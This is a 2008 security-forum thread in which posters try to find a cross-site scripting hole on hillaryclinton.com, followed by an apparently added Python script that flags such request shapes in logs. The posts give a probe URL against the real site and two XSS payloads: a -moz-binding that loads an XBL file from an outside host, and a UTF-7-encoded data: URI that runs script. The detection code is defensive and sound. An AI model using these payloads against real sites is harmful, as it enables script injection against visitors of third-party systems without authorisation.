Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Possible Hillary Clinton XSS
Posted by: PaPPy
Date: May 28, 2008 01:16PM

Been working at this for some time but can't seem to get anything to work.

http://www.hillaryclinton.com/_base/error/?aspxerrorpath=/redirs/form/default.aspx&ref="><
But if I add anything after that it seems to fail...

Well, just throwing it out there if anyone can improve on my failure.

Re: Possible Hillary Clinton XSS
Posted by: Jiu
Date: May 28, 2008 04:33PM

"style="-moz-binding:url('//ha.ckers.org/xssmoz.xml%23xss');

Seems that it no longer works on FF2 :(

"style="-moz-binding:url(data:text/xml;charset=utf-7,%2bADw-?xml version='1.0'?%2bAD4APA-bindings xmlns='http://www.mozilla.org/xbl'%2bAD4APA-binding%20id='xss'%2bAD4APA-implementation%2bAD4APA-constructor%2bAD4-alert('XSS');%2bAPA-/constructor%2bAD4APA-/implementation%2bAD4APA-/binding%2bAD4APA-/bindings%2bAD4-);

Doesn't work, perhaps you can't use utf-7 here ^^



Edited 2 time(s). Last edit at 05/28/2008 04:38PM by Jiu.
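
A defender-side check for the request shapes posted in this thread, as an added example that is not part of the original posts: it URL-decodes each query parameter and flags a quote that closes an attribute, a `-moz-binding` declaration, a `utf-7` charset, and markup hidden inside UTF-7 runs. The host `app.example`, the shortened sample URLs and all function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Markers taken from the payload shapes posted in this thread.
ATTR_BREAKOUT = re.compile(r'"\s*(>|style\s*=)', re.I)  # quote closes the attribute
MOZ_BINDING = re.compile(r'-moz-binding\s*:', re.I)
UTF7_CHARSET = re.compile(r'charset\s*=\s*utf-7', re.I)
UTF7_RUN = re.compile(r'\+[A-Za-z0-9+/]+-')              # shifted run such as +ADw-
MARKUP = re.compile(r'<\s*[?/A-Za-z]')


def decode_utf7_runs(value):
    """Decode each +...- run so markup hidden as UTF-7 becomes visible."""
    def repl(match):
        try:
            return match.group(0).encode('ascii').decode('utf-7')
        except UnicodeError:
            return match.group(0)  # not valid UTF-7, leave untouched
    return UTF7_RUN.sub(repl, value)


def inspect_url(url):
    """Return sorted (parameter, finding) pairs for one request URL."""
    findings = set()
    # Split on '&' only, so the ';' inside a data: URI stays in one value.
    for pair in urlsplit(url).query.split('&'):
        name, _, raw = pair.partition('=')
        value = unquote_plus(raw)
        if ATTR_BREAKOUT.search(value):
            findings.add((name, 'attribute-breakout'))
        if MOZ_BINDING.search(value):
            findings.add((name, 'moz-binding'))
        if UTF7_CHARSET.search(value):
            findings.add((name, 'utf7-charset'))
        decoded = decode_utf7_runs(value)
        if decoded != value and MARKUP.search(decoded):
            findings.add((name, 'utf7-hidden-markup'))
    return sorted(findings)


# Constructed sample requests; app.example is a placeholder host.
SAMPLE_REQUESTS = [
    'https://app.example/_base/error/?aspxerrorpath=/redirs/form/default.aspx&ref=%22%3E%3C',
    'https://app.example/_base/error/?ref=%22style=%22-moz-binding:url(data:text/xml;charset=utf-7,%2bADw-bindings%2bAD4-)',
    'https://app.example/search?q=c%2B%2B+tips&ref=/home',
]

if __name__ == '__main__':
    for url in SAMPLE_REQUESTS:
        print(inspect_url(url), url)
```

A hit on `attribute-breakout` for a parameter that is echoed into a page means the value must be HTML-attribute-encoded on output; the other three findings are useful as alerting signals in request logs.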
